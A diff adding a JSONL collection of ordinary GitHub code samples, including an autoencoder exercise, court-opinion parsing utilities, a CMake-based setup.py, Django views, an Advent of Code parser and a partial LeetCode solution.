diff --git "a/4633.jsonl" "b/4633.jsonl" new file mode 100644--- /dev/null +++ "b/4633.jsonl" @@ -0,0 +1,177 @@ +{"seq_id":"3210952243","text":"import typing\n# Bit = typing.NewType(\"Bit\", int)\nfrom typing import Union\n\nfrom bitarray import bitarray\n\n\"\"\"\nBinary one or zero\n\"\"\"\n\nBit = typing.NewType(\"Bit\", int)\nLOW = 0\nHIGH = 1\n\n\ndef nibble(ptr: int = 0) -> bitarray:\n \"\"\"\n return a 0 initialized nibble of bits (4 bits)\n \"\"\"\n assert 0xf >= ptr >= 0, f\"value {ptr} out of range\"\n return bitarray(f\"{bin(ptr)[2:]:{0}>4}\")\n\n\nPointer = Union[bitarray, int]\nMISSING = object()\n\"\"\"\nUsed to represent a missing operand\n\"\"\"\n","repo_name":"theunkn0wn1/SAP1","sub_path":"sap1/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"14004001524","text":"#!/usr/bin/env python3\n\"\"\"\ncreates an autoencoder\n\"\"\"\nimport tensorflow.keras as keras\n\n\ndef buildEncoder(input_dims, hidden_layers, latent_dims):\n \"\"\"build encoder\"\"\"\n encoderInput = keras.Input(shape=(input_dims,))\n x = encoderInput\n\n for units in hidden_layers:\n x = keras.layers.Dense(units=units, activation=\"relu\")(x)\n\n encoderOutput = keras.layers.Dense(\n units=latent_dims, activation=\"relu\"\n )(x)\n\n return (\n keras.Model(inputs=encoderInput, outputs=encoderOutput),\n encoderInput,\n )\n\n\ndef buildDecoder(latent_dims, hidden_layers, output_dims):\n \"\"\"build decoder\"\"\"\n decoderInput = keras.Input(shape=(latent_dims,))\n x = decoderInput\n\n for units in reversed(hidden_layers):\n x = keras.layers.Dense(units=units, activation=\"relu\")(x)\n\n decoderOutput = keras.layers.Dense(\n units=output_dims, activation=\"sigmoid\"\n )(x)\n\n return keras.Model(inputs=decoderInput, outputs=decoderOutput)\n\n\ndef autoencoder(input_dims, hidden_layers, latent_dims):\n \"\"\"\n input_dims is an integer containing\n the dimensions of the model input\n hidden_layers is a list containing\n the number of nodes for each hidden layer\n in the encoder, respectively\n the hidden layers should be reversed for the decoder\n latent_dims is an integer containing\n the dimensions of the latent space representation\n Returns: encoder, decoder, auto\n encoder is the encoder model\n decoder is the decoder model\n auto is the full autoencoder model\n The autoencoder model should be compiled\n using adam optimization and binary cross-entropy loss\n All layers should use a relu activation\n except for the last layer in the decoder,\n which should use sigmoid\n \"\"\"\n encoder, encoderInput = buildEncoder(\n input_dims, hidden_layers, latent_dims\n )\n decoder = buildDecoder(latent_dims, hidden_layers, input_dims)\n\n encodedOutput = encoder(encoderInput)\n decodedOutput = decoder(encodedOutput)\n\n auto = keras.Model(inputs=encoderInput, outputs=decodedOutput)\n auto.compile(optimizer=\"adam\", loss=\"binary_crossentropy\")\n\n return encoder, decoder, auto\n","repo_name":"spindouken/holbertonschool-machine_learning","sub_path":"unsupervised_learning/autoencoders/0-vanilla.py","file_name":"0-vanilla.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"32624275610","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 8 09:34:01 2019\n\n@author: dan\n\"\"\"\n\n\n### Imports\n\nimport os\nimport re\nfrom dateutil.parser import parse as 
parseDate\n\nfrom OPparser_lists import validEndPeriodWords, sepLinesList, caseNoRE1, caseNoRE2, caseNoRE3, caseNoRE4, caseNoRE5\n\n\n\n\n### Globals\n\nCaseNameCaseList = [\"LLC\", \"LP\", \"LLP\", \"SS\", \"II\", \"III\", \"IV\", \"V\", \"VI\", \n \"VII\", \"VIII\", \"IX\", \"X\", \"XI\", \"XII\", \"XIII\", \"XIV\", \"XV\", \n \"XVI\", \"XVII\", \"XVIII\", \"XIX\", \"XX\", \"CDO\"]\n\n\n\n### Paths\n\nchromeDriver = \"/home/dan/ChromeDriver/chromedriver\"\nrawDataDir_DEGOV = \"/home/dan/Data/DelawareGov/Raw/\"\nproDataDir_DEGOV = \"/home/dan/Data/DelawareGov/Processed/\"\nrawDataDir_CL = \"/home/dan/Data/CourtListener/Raw/Extracted/\"\ncompressedDataDir_CL = \"/home/dan/Data/CourtListener/Raw/Compressed/\"\nproDataDir_CL = \"/home/dan/Data/CourtListener/Processed/\"\n\n\n\n### Data URLs\n\nseed_DEGOV = 'https://courts.delaware.gov/opinions'\n\n\nseed_DECL = {'del': 'https://www.courtlistener.com/api/bulk-data/opinions/del.tar.gz',\n 'delch': 'https://www.courtlistener.com/api/bulk-data/opinions/delch.tar.gz',\n 'delsuperct': 'https://www.courtlistener.com/api/bulk-data/opinions/delsuperct.tar.gz',\n 'delctcompl': 'https://www.courtlistener.com/api/bulk-data/opinions/delctcompl.tar.gz',\n 'delfamct': 'https://www.courtlistener.com/api/bulk-data/opinions/delfamct.tar.gz',\n 'deljudct': 'https://www.courtlistener.com/api/bulk-data/opinions/deljudct.tar.gz'}\n\nseed_PACL = {'pa': 'https://www.courtlistener.com/api/bulk-data/opinions/pa.tar.gz',\n 'pasuperct': 'https://www.courtlistener.com/api/bulk-data/opinions/pasuperct.tar.gz',\n 'pacommwct': 'https://www.courtlistener.com/api/bulk-data/opinions/pacommwct.tar.gz',\n 'cjdpa': 'https://www.courtlistener.com/api/bulk-data/opinions/cjdpa.tar.gz'}\n\n\nseed_USCL = {'scotus':'https://www.courtlistener.com/api/bulk-data/opinions/scotus.tar.gz',\n 'ca2':'https://www.courtlistener.com/api/bulk-data/opinions/ca2.tar.gz',\n 'ca3':'https://www.courtlistener.com/api/bulk-data/opinions/ca3.tar.gz', \n 'ded':'https://www.courtlistener.com/api/bulk-data/opinions/ded.tar.gz',\n 'deb':'https://www.courtlistener.com/api/bulk-data/opinions/deb.tar.gz', \n 'paed':'https://www.courtlistener.com/api/bulk-data/opinions/paed.tar.gz', \n 'pamd':'https://www.courtlistener.com/api/bulk-data/opinions/pamd.tar.gz', \n 'pawd':'https://www.courtlistener.com/api/bulk-data/opinions/pawd.tar.gz', \n 'paeb':'https://www.courtlistener.com/api/bulk-data/opinions/paeb.tar.gz', \n 'pamb':'https://www.courtlistener.com/api/bulk-data/opinions/pamb.tar.gz', \n 'pawb':'https://www.courtlistener.com/api/bulk-data/opinions/pawb.tar.gz',\n 'njd':'https://www.courtlistener.com/api/bulk-data/opinions/njd.tar.gz', \n 'njb':'https://www.courtlistener.com/api/bulk-data/opinions/njb.tar.gz',}\n# 'nyeb':'https://www.courtlistener.com/api/bulk-data/opinions/nyeb.tar.gz', \n# 'nynb':'https://www.courtlistener.com/api/bulk-data/opinions/nynb.tar.gz', \n# 'nysb':'https://www.courtlistener.com/api/bulk-data/opinions/nysb.tar.gz', \n# 'nywb':'https://www.courtlistener.com/api/bulk-data/opinions/nywb.tar.gz', \n# 'nyed':'https://www.courtlistener.com/api/bulk-data/opinions/nyed.tar.gz', \n# 'nynd':'https://www.courtlistener.com/api/bulk-data/opinions/nynd.tar.gz', \n# 'nysd':'https://www.courtlistener.com/api/bulk-data/opinions/nysd.tar.gz', \n# 'nywd':'https://www.courtlistener.com/api/bulk-data/opinions/nywd.tar.gz',\n# 'ctd':'https://www.courtlistener.com/api/bulk-data/opinions/ctd.tar.gz', \n# 'ctb':'https://www.courtlistener.com/api/bulk-data/opinions/ctb.tar.gz',\n# 
'vtd':'https://www.courtlistener.com/api/bulk-data/opinions/vtd.tar.gz', \n# 'vtb':'https://www.courtlistener.com/api/bulk-data/opinions/vtb.tar.gz'}\n\n\n### Functions\n\ndef fixCaseNameCase(caseName):\n wordlist = caseName.strip().split()\n newlist = []\n for word in wordlist:\n if word.isupper():\n if word not in CaseNameCaseList: \n newword = getTitle0(word)\n newlist.append(newword)\n else: newlist.append(word)\n else: newlist.append(word)\n newtext = ' '.join(newlist)\n newtext = newtext.replace(\"In Re\", \"In re\") # AD HOC FIX\n return newtext\n\n\n\n\n\ndef removeCaseNos(text):\n text = caseNoRE3.sub(\"\", text) # Remove case numbers #1 (Del Superior Style) ORDER MATTERS: THIS IS MORE \"GREEDY\" THAN OTHERS; RUNNING THE OTHERS FIRST WILL LEAVE FRAGMENTS OF CASE NUMBERS THIS ONE WAS MEANT TO CATCH!!!\n text = caseNoRE1.sub(\"\", text) # Remove case numbers #2 (Del Supreme Style)\n text = caseNoRE2.sub(\"\", text) # Remove case numbers #3 (Del Chancery Old Style)\n text = caseNoRE4.sub(\"\", text)\n text = caseNoRE5.sub(\"\", text)\n text = text.strip()\n return text\n\n\n\n\n\n\ndef getFileList(path, ext='', recursive=False):\n fileList = []\n if not path.endswith('/'): path = path + '/'\n if recursive:\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(ext): fileList.append(str(os.path.join(root, file)))\n else:\n fileList = [path + file for file in os.listdir(path)\\\n if os.path.isfile(os.path.join(path, file)) and file.endswith(ext)]\n return fileList\n\n\n\n\n\ndef numLowerCaseWords(string):\n wordList = string.split()\n numLCwords = 0\n for word in wordList:\n if word.islower(): numLCwords += 1\n return numLCwords\n\n\n\n\n\ndef getTitle0(word):\n newword = word.title()\n if \"'\" in word:\n pos = word.find(\"'\")\n if len(word) > pos + 1:\n newword = newword[:pos+1] + newword[pos+1].lower() + newword[pos+2:]\n return newword\n\n\n\n\n\ndef addAmpersands(rawParties):\n rawParties = rawParties.replace('Oil and Gas', 'Oil & Gas')\n rawParties = rawParties.replace('Oil and Refining', 'Oil & Refining')\n rawParties = rawParties.replace('Current and Former', 'Current & Former')\n rawParties = rawParties.replace('Health, Education and Welfare', 'Health Education & Welfare')\n rawParties = rawParties.replace(\"PENSION AND RETIREMENT\", \"PENSION & RETIREMENT\")\n rawParties = rawParties.replace('OFFICERS AND FIREFIGHTERS', 'OFFICERS & FIREFIGHTERS')\n return rawParties\n\n\n\n\n\ndef stripPeriods(partyString):\n\n newPartyString = ''\n partyList = partyString.split(';')\n\n for party in partyList:\n\n removeEndPeriod = False\n removeStartPeriod = False\n\n if party.endswith('.'):\n removeEndPeriod = True\n for word in validEndPeriodWords:\n if party.lower().endswith(word): removeEndPeriod = False\n if len(partyString) >= 4:\n if (partyString[-3] == '.') and (partyString[-2].isupper()) and (partyString[-4].isupper()):\n removeEndPeriod = False\n\n if party.startswith('.'): removeStartPeriod = True\n\n if removeEndPeriod and removeStartPeriod: newPartyString += party[1:-1] + ';'\n elif removeEndPeriod: newPartyString += party[:-1] + ';'\n elif removeStartPeriod: newPartyString += party[1:] + ';'\n else: newPartyString += party + ';'\n\n if newPartyString.endswith(';'): newPartyString = newPartyString[:-1]\n\n # Remove starting and ending spaces from each entry in the party list\n finalPartyList = [party[1:] if party.startswith(' ') else party for party in newPartyString.split(';')]\n finalPartyList = [party[:-1] if party.endswith(' ') else party for 
party in finalPartyList]\n finalPartyString = ';'.join(finalPartyList)\n\n return finalPartyString\n\n\n\n\n\ndef replaceCase(replaceDict, word):\n\n # ONLY works on uppercase, lowercase, and titlecase words\n upperFlag = False\n titleFlag = False\n lowerFlag = False\n if word.isupper(): upperFlag = True\n elif word.istitle(): titleFlag = True\n elif word.islower(): lowerFlag = True\n else:\n return word\n\n if word.lower() in replaceDict.keys(): newword = replaceDict[word.lower()]\n else: newword = word\n\n if lowerFlag: return newword\n elif upperFlag: return newword.upper()\n elif titleFlag: return newword[0].upper() + newword[1:] # Fixes cases like \"emp't\", which would return \"Emp'T' if we simply did neword.title()\n else: return word\n\n \n\n\n\ndef cutWords(wordList, string):\n for word in wordList:\n searchFlag = True\n while searchFlag == True:\n startPos = string.lower().find(word)\n if startPos > -1: \n string = string[:startPos] + string[startPos + len(word):]\n else:\n searchFlag = False\n return string\n\n\n\n\n\ndef cutWords2(wordList, string):\n for word in wordList:\n regex = re.compile(re.escape(word), re.IGNORECASE)\n string = regex.sub('', string)\n string = string.strip()\n return string\n\n\n\n\n\ndef isDate(string): \n try:\n parseDate(string, fuzzy=True).date().isoformat()\n return True\n except:\n return False\n\n\n\n\n\ndef deleteSepLines(pageList):\n\n if len(pageList) < 2:\n return pageList\n \n else:\n newPageList = []\n for page in pageList:\n if type(page) == int:\n newPageList.append(page)\n else:\n newPage = [line for line in page if (line not in sepLinesList)]\n newPageList.append(newPage)\n return newPageList\n\n\n\n\n\n#Delete preceding and trailing lines that are just '\\n' and nothing else\ndef delExtraNewlines(lineList):\n lineList = delPrecedingNewlines(lineList)\n lineList = delTrailingNewlines(lineList)\n return lineList\n\n#Recursively delete preceding lines that are just '\\n' or spaces and nothing else\ndef delPrecedingNewlines(lineList):\n if len(lineList) < 1: return lineList\n if lineList[0].strip() == '': return delPrecedingNewlines(lineList[1:])\n else: return lineList\n\n#Recursively delete trailing lines that are just '\\n' or spaces and nothing else\ndef delTrailingNewlines(lineList):\n if len(lineList) < 1: return lineList\n if lineList[-1].strip() == '': return delTrailingNewlines(lineList[:-1])\n else: return lineList\n\n\n\n\n\ndef isTitleCase(string):\n \n wordReplace = {'of':'Of', 'the':'The', 'and':'And', 'a':'A', 'for':'For', \n 'to':'To', 'on':'On', 'with':'With', 'that':'That', '\\n':''}\n wordList = string.split()\n newWordList = []\n for word in wordList:\n if word in wordReplace.keys(): newWordList.append(wordReplace[word])\n else:newWordList.append(word)\n newstring = ' '.join(newWordList)\n\n return newstring.istitle()\n\n\n\n# Significantly more permissive than the last one; used for section-header detection in mainText formatting\ndef isTitleCase2(string):\n\n if len(string) == 0: return False\n \n # Remove all numbers and some misc punctuation\n newstring = re.sub('\\d+', '', string)\n newstring = newstring.replace(' . ', '')\n if newstring.startswith('.'): newstring = newstring[1:]\n\n # Remove apostrophe's and quotation marks\n newstring = newstring.replace('’', '').replace('\\'', '').replace('\\\"', '')\n\n # Remove lowercase section heading characters\n newstring = re.sub(r'^[a-z]\\.(\\s+[A-Z])', r'\\1', newstring) # E.G.: \"a. 
Approval of the Merger\"\n newstring = re.sub(r'\\([a-z]\\)', '', newstring) # Fixes cases like: \"Section 1.2(c)\"\n\n # Set of tokens that can be lowercase in titles\n wordSet = {'of', 'the', 'and', 'a', 'an', 'for', 'to', 'on', 'with', \n 'that', 'in', 'is', '\\n'}\n\n # Create list of words; return True if the list is empty (i.e., the \n # previous operations removed all words)\n wordList = newstring.strip().split()\n if len(wordList) == 0: return True\n\n # Main Loop: counts number of impermissible lower case words\n lcCounter = 0\n for word in wordList:\n if word[0].isupper(): continue\n if word in wordSet: continue\n lcCounter += 1\n\n # Compute \"Lowercase Quotient\", i.e. the ratio of imperissible lower case words to words\n lcQ = lcCounter / len(wordList)\n\n # Returns True if there are NO impermissible LC words; might need to tune how this works\n return (lcQ == 0)\n\n\n\n\n\ndef flatten(listOfStrings):\n flatVersion = ''\n for line in listOfStrings:\n flatVersion += line\n return flatVersion\n\n\n\n\n\ndef delExcessLineSpaces(text):\n newText = []\n for page in text:\n newPage = delPrecedingLineSpaces(page)\n newPage = delTrailingLineSpaces(newPage)\n newText.append(newPage)\n return newText\n\n\ndef delPrecedingLineSpaces(page):\n if page == []: return page\n if page[0].strip() == '': return delPrecedingLineSpaces(page[1:])\n else: return page\n\n\ndef delTrailingLineSpaces(page):\n if page == []: return page\n if page[-1].strip() == '': return delTrailingLineSpaces(page[:-1])\n else: return page\n\n\n\n\n\ndef getMaxLL(text):\n lineLens = sorted([len(line) for page in text for line in page])\n if len(lineLens) > 350: maxLen = lineLens[int(.99 * len(lineLens))]\n elif len(lineLens) > 0: maxLen = lineLens[int(.98 * len(lineLens))]\n else: maxLen = 0\n return maxLen\n\n\n\n\n\n\ndef getCtDirFromCLlink(text):\n\n saveDir = \"\"\n if \"del.tar\" in text: saveDir = \"/Delaware/Supreme/\"\n elif \"delch.tar\" in text: saveDir = \"/Delaware/Chancery/\"\n elif \"delsuperct.tar\" in text: saveDir = \"/Delaware/Superior/\"\n elif \"delctcompl.tar\" in text: saveDir = \"/Delaware/CommonPleas/\"\n elif \"delfamct.tar\" in text: saveDir = \"/Delaware/Family/\"\n elif \"deljudct.tar\" in text: saveDir = \"/Delaware/Judicial/\"\n\n elif 'pa.tar' in text: saveDir = \"/Pennsylvania/Supreme/\"\n elif 'pacommwct.tar' in text: saveDir = \"/Pennsylvania/Commonwealth/\"\n elif 'pasuperct.tar' in text: saveDir = \"/Pennsylvania/Superior/\"\n elif 'cjdpa.tar' in text: saveDir = \"/Pennsylvania/Judicial/\"\n \n elif 'scotus.tar' in text: saveDir = \"/Federal/scotus/\"\n elif 'ca2' in text: saveDir = \"/Federal/ca2/\"\n elif 'ca3' in text: saveDir = \"/Federal/ca3/\"\n elif 'ded' in text: saveDir = \"/Federal/ded/\"\n elif 'deb' in text: saveDir = \"/Federal/deb/\"\n elif 'paed' in text: saveDir = \"/Federal/paed/\"\n elif 'pamd' in text: saveDir = \"/Federal/pamd/\"\n elif 'pawd' in text: saveDir = \"/Federal/pawd/\"\n elif 'paeb' in text: saveDir = \"/Federal/paeb/\"\n elif 'pamb' in text: saveDir = \"/Federal/pamb/\"\n elif 'pawb' in text: saveDir = \"/Federal/pawb/\"\n elif 'njd' in text: saveDir = \"/Federal/njd/\"\n elif 'njb' in text: saveDir = \"/Federal/njb/\"\n elif 'nyed' in text: saveDir = \"/Federal/nyed/\"\n elif 'nynd' in text: saveDir = \"/Federal/nynd/\"\n elif 'nysd' in text: saveDir = \"/Federal/nysd/\"\n elif 'nywd' in text: saveDir = \"/Federal/nywd/\"\n elif 'nyeb' in text: saveDir = \"/Federal/nyeb/\"\n elif 'nynb' in text: saveDir = \"/Federal/nynb/\"\n elif 'nysb' in text: 
saveDir = \"/Federal/nysb/\"\n elif 'nywb' in text: saveDir = \"/Federal/nywb/\"\n elif 'ctd' in text: saveDir = \"/Federal/ctd/\"\n elif 'ctb' in text: saveDir = \"/Federal/ctb/\"\n elif 'vtd' in text: saveDir = \"/Federal/vtd/\"\n elif 'vtb' in text: saveDir = \"/Federal/vtb/\"\n\n else: saveDir = \"\"\n \n return saveDir\n\n\n\n","repo_name":"ciarrocki/LibreLaw","sub_path":"OPparser/OPparser_utils.py","file_name":"OPparser_utils.py","file_ext":"py","file_size_in_byte":15481,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"55"} +{"seq_id":"14990663933","text":"\"\"\"Holds all relevant information for packaging and publishing to PyPI.\"\"\"\nfrom setuptools import Extension, setup\nfrom setuptools.command.build_ext import build_ext\n\nimport os\nfrom pathlib import Path\nimport platform\nimport re\nimport subprocess\nimport sys\nfrom distutils.version import LooseVersion\n\nVERSION = \"3.3.1\"\n\n\nwith open(\"INFO.md\") as readme_file:\n readme = readme_file.read()\n\n# List any runtime requirements here\nrequirements = [\"numpy\", \"cmake\", \"xmltodict\"]\n\n\nclass CMakeExtension(Extension):\n def __init__(self, name, sourcedir=\"\"):\n Extension.__init__(self, name, sources=[])\n self.sourcedir = os.path.abspath(sourcedir)\n\n\nclass CMakeBuild(build_ext):\n def run(self):\n try:\n out = subprocess.check_output([\"cmake\", \"--version\"])\n except OSError:\n raise RuntimeError(\n \"CMake must be installed and available at PATH ({0}) to build the following extensions: {1}\".format(\n os.environ.get(\"PATH\"), \", \".join(e.name for e in self.extensions)\n )\n )\n cmake_version = LooseVersion(re.search(r\"version\\s*([\\d.]+)\", out.decode()).group(1))\n if platform.system() == \"Windows\":\n cmake_version = LooseVersion(re.search(r\"version\\s*([\\d.]+)\", out.decode()).group(1))\n if cmake_version < \"3.1.0\":\n raise RuntimeError(\"CMake >= 3.1.0 is required on Windows\")\n\n for ext in self.extensions:\n self.build_extension(ext)\n\n def build_extension(self, ext):\n path_var = os.environ.get(\"PATH\")\n path_var = str(Path(sys.executable).parent) + \":\" + path_var\n env = dict(os.environ.copy(), PATH=path_var)\n extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n cmake_args = [\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=\" + extdir,\n \"-DPYTHON_EXECUTABLE=\" + sys.executable, # used for pybind11\n \"-DLIBCZI_BUILD_UNITTESTS=\" + \"OFF\", # used for libczi\n \"-DLIBCZI_BUILD_CZICMD=\" + \"OFF\", # used for libczi\n \"-DLIBCZI_BUILD_CZICHECK=\" + \"OFF\"] # used for libczi\n\n cfg = \"Debug\" if self.debug else \"Release\"\n build_args = [\"--config\", cfg]\n\n if platform.system() == \"Windows\":\n cmake_args += [\"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}\".format(cfg.upper(), extdir)]\n cmake_args += [\"-DCMAKE_GENERATOR_PLATFORM=x64\"]\n build_args += [\"--\", \"/m\"]\n else:\n cmake_args += [\"-DCMAKE_BUILD_TYPE=\" + cfg]\n build_args += [\"--\", \"-j2\"]\n\n env[\"CXXFLAGS\"] = '{} -DVERSION_INFO=\\\\\"{}\\\\\"'.format(env.get(\"CXXFLAGS\", \"\"), self.distribution.get_version())\n if not os.path.exists(self.build_temp):\n os.makedirs(self.build_temp)\n subprocess.check_call([\"cmake\", ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env)\n subprocess.check_call(\n [\"cmake\", \"--build\", \".\", \"--target\", \"_pylibCZIrw\"] + build_args, cwd=self.build_temp, env=env\n )\n\nsetup(\n name=\"pylibCZIrw\",\n version=VERSION,\n author=\"Felix Scheffler\",\n author_email=\"felix.scheffler@zeiss.com\",\n 
description=\"A python wrapper around the libCZI C++ library with reading and writing functionality.\",\n long_description=readme,\n long_description_content_type=\"text/markdown\",\n # See https://setuptools.pypa.io/en/latest/userguide/datafiles.html\n include_package_data=True,\n keywords=\"czi, imaging\",\n ext_modules=[CMakeExtension(\"_pylibCZIrw\")],\n packages=[\"pylibCZIrw\"],\n cmdclass=dict(build_ext=CMakeBuild),\n install_requires=requirements,\n # we require at least python version 3.7\n python_requires=\">=3.7,<4\",\n license_files=['COPYING.txt', 'COPYING.LESSER.txt', 'NOTICE.txt'],\n # Classifiers help users find your project by categorizing it.\n # For a list of valid classifiers, see https://pypi.org/classifiers/\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Topic :: Scientific/Engineering :: Image Processing\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: Unix\"\n ],\n zip_safe=False,\n)\n","repo_name":"luv-kotoli/pylibczirw","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"7232238628","text":"\n# 3. Smallest Number\n# Given an list of numbers, print the smallest of the numbers.\n\nnum_list = [9, -2, 5, 3, 1]\n\ndef smallest(numbers):\n numbers.sort()\n return numbers[0]\n\nprint(smallest(num_list))\n","repo_name":"Richiewong07/Python-Exercises","sub_path":"python-assignments/list/smallest_number.py","file_name":"smallest_number.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"30363018570","text":"#from django.http import HttpResponse\nfrom django.shortcuts import render\n\ndef hi(request,x,y):\n #w = request.GET.get('w')\n #return HttpResponse('
<h1>{}</h1>
',format(x / y))\n s = x + y\n return render(request,'hi.html',{'s':s},)\n\ndef r(request,x1,y1):\n\n if x1 > y1:\n x1 , y1 = y1 , x1\n rang1 = range(x1,y1+1)\n rang1 = reversed(rang1)\n else:\n rang1 = range(x1, y1 + 1)\n\n return render(request,'r.html',{'rang1':rang1},)\n\ndef tag_test(request):\n ll = [2,4,6,8,10,12,2,4,6,8,10,12]\n\n return render(request,'tag_test.html',{'ll':ll},)","repo_name":"hmr0836/django","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"39647623577","text":"import io\nimport pytest\n\nclass Leaf:\n def __init__(self,c):\n self.c = c\n def __repr__(self):\n return self.c\n\ndef parse(fp):\n messages_now = False\n messages = []\n\n tbl = {}\n for line in fp:\n line = line.rstrip('\\n')\n state = None\n expr = []\n term = []\n for token in line.split(\" \"):\n if messages_now:\n if len(token) == 0:\n pass\n else:\n messages.append(token)\n else:\n if len(token) == 0:\n messages_now = True\n elif token[-1] == ':':\n state = int(token[:-1])\n elif token == '|':\n expr.append(term)\n term = []\n elif token[0] == '\"':\n term.append(Leaf(token[1]))\n else:\n term.append(int(token))\n if not messages_now:\n expr.append(term)\n tbl[state] = expr\n return tbl, messages\n\ndef isvalid( tbl, message):\n \n def gen0( rule, cursor):\n if type(rule) == Leaf:\n if cursor < len(message) and message[cursor] == rule.c:\n yield cursor+1\n else:\n yield from gen2( tbl[rule], cursor)\n\n def gen1( lst, cursor):\n if len(lst) == 0:\n yield cursor\n else:\n for next_cursor in gen0( lst[0], cursor):\n yield from gen1( lst[1:], next_cursor)\n\n def gen2( lol, cursor):\n for lst in lol:\n yield from gen1(lst, cursor)\n\n for next_cursor in gen0( 0, 0):\n if next_cursor == len(message):\n return True\n\n return False\n\n\ndef main(fp):\n tbl, messages = parse(fp)\n\n count = 0\n for message in messages:\n if isvalid( tbl, message):\n count += 1\n\n print(f\"count: {count}\")\n return count\n \ndef test_A():\n txt = \"\"\"0: 4 1 5\n1: 2 3 | 3 2\n2: 4 4 | 5 5\n3: 4 5 | 5 4\n4: \"a\"\n5: \"b\"\n\nababbb\nbababa\nabbbab\naaabbb\naaaabbb\n\"\"\"\n\n with io.StringIO(txt) as fp:\n assert main(fp) == 2\n\ndef test_AA():\n txt = \"\"\"0: 4 5 | 4 0 5\n4: \"a\"\n5: \"b\"\n\na\nb\nab\naabb\naaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbb\naabbb\n\"\"\"\n with io.StringIO(txt) as fp:\n assert main(fp) == 3\n\ndef test_AAA():\n txt = \"\"\"0: 2\n2: \"a\" 2 \"a\" | \"a\" \"a\"\n\naaaa\naa\naaa\na\n\"\"\"\n with io.StringIO(txt) as fp:\n assert main(fp) == 2\n\ndef test_AAAA():\n txt = \"\"\"0: 1\n1: \"b\" 1 | \"b\"\n\nbb\nbbb\n\"\"\"\n with io.StringIO(txt) as fp:\n assert main(fp) == 2\n\ndef test_AAAAA():\n txt = \"\"\"0: \"b\" | \"b\" 0\n\nbbb\n\"\"\"\n with io.StringIO(txt) as fp:\n assert main(fp) == 1\n\ndef test_B():\n txt = \"\"\"0: 1 2\n1: \"a\"\n2: \"b\"\n\nab\naba\nba\na\nb\n\"\"\"\n with io.StringIO(txt) as fp:\n assert main(fp) == 1\n\ndef test_C():\n with open( \"data\", \"rt\") as fp:\n main(fp)\n\ndef test_D():\n with open( \"data1\", \"rt\") as fp:\n main(fp)\n","repo_name":"stevenmburns/adventofcode","sub_path":"2020/19/test_A.py","file_name":"test_A.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"55"} +{"seq_id":"40252919363","text":"\"\"\"\nGiven the root of a binary tree and an integer distance. 
A pair of two different leaf nodes of a binary tree \nis said to be good if the length of the shortest path between them is less than or equal to distance.\n\nReturn the number of good leaf node pairs in the tree.\n\nExample 1:\n\nInput: root = [1,2,3,null,4], distance = 3\nOutput: 1\nExplanation: The leaf nodes of the tree are 3 and 4 and the length of the shortest path between them is 3. \nThis is the only good pair.\n\nExample 2:\n\n\nInput: root = [1,2,3,4,5,6,7], distance = 3\nOutput: 2\nExplanation: The good pairs are [4,5] and [6,7] with shortest path = 2. The pair [4,6] is not good because the \nlength of ther shortest path between them is 4.\n\nExample 3:\n\nInput: root = [7,1,4,6,null,5,3,null,null,null,null,null,2], distance = 3\nOutput: 1\nExplanation: The only good pair is [2,5].\n\nExample 4:\n\nInput: root = [100], distance = 1\nOutput: 0\n\nExample 5:\n\nInput: root = [1,1,1], distance = 2\nOutput: 1\n\nConstraints:\n\nThe number of nodes in the tree is in the range [1, 2^10].\nEach node's value is between [1, 100].\n1 <= distance <= 10\n\"\"\"\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n# # DFS: 对于每一个节点,找他的左节点下所有叶子节点高度和右节点下所有叶子节点高度。对于所有叶子节点的高度,\n# # 如果左叶子节点的高度+右叶子节点的高度<=distance,就把 cnt 加 1。(这是叶子节点在左右边的情况)\n# # 然后还要加上叶子节点在同一边的情况\n# # 但这个会多次计算节点高度,时间复杂度高\n# class Solution:\n# def countPairs(self, root: TreeNode, distance: int) -> int:\n# def findAllLeafsHeight(node, currHeight, heights):\n# if not node: return []\n\n# if not node.left and not node.right:\n# heights.append(currHeight)\n# return\n\n# findAllLeafsHeight(node.left, currHeight + 1, heights)\n# findAllLeafsHeight(node.right, currHeight + 1, heights)\n\n# def dfs(node, distance):\n# if not node: return 0\n\n# cnt = 0\n# leftHeights = []\n# rightHeights = []\n# findAllLeafsHeight(node.left, 1, leftHeights)\n# findAllLeafsHeight(node.right, 1, rightHeights)\n\n# leftHeights.sort()\n# rightHeights.sort()\n\n# for leftHeight in leftHeights:\n# if leftHeight >= distance: break\n\n# for rightHeight in rightHeights:\n# if leftHeight + rightHeight <= distance:\n# cnt += 1\n# else:\n# break\n\n# return cnt + dfs(node.left, distance) + dfs(node.right, distance)\n\n# return dfs(root, distance)\n\n# 需要使用一个全局变量来保存结果\nclass Solution:\n def __init__(self):\n self.res = 